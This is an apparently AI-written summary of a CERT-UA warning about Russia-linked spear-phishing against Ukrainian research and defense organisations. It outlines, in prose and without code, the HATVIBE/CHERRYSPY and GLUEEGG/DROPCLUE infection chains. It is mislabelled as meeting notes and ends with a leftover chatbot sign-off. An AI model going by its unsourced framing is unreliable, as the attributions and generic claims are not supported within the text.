July 23, 2024 at 06:28AM
CERT-UA warned of a cyber espionage campaign targeting a Ukrainian research institution with HATVIBE and CHERRYSPY malware. The attack leverages a compromised email account to distribute macro-laced Microsoft Word attachments, leading to the execution of the malware. A Russia-linked group, APT28, and UAC-0063 are attributed to the attack, with similar campaigns targeting Ukrainian defense enterprises.
Key takeaways from the meeting notes:
– The Computer Emergency Response Team of Ukraine (CERT-UA) has reported a spear-phishing campaign targeting a scientific research institution in Ukraine with malware known as HATVIBE and CHERRYSPY, attributed to a threat actor known as UAC-0063/ APT28, linked to Russia’s GRU.
– The attack involves using compromised email accounts to send phishing messages with macro-laced Microsoft Word attachments, resulting in the execution of an encoded HTML Application (HTA) named HATVIBE, leading to the Python backdoor CHERRYSPY being installed, allowing remote command execution.
– CERT-UA has also detailed another phishing campaign targeting Ukrainian defense enterprises with booby-trapped PDF files embedding a link that, when clicked, downloads an executable (aka GLUEEGG), which runs a Lua-based loader called DROPCLUE, responsible for downloading a legitimate Remote Desktop program called Atera Agent using curl utility.
– These attacks exploit known security flaws, posing a significant cybersecurity threat, requiring proactive measures for defense and mitigation.
Please let me know if you need any further information or if there is anything else I can help with.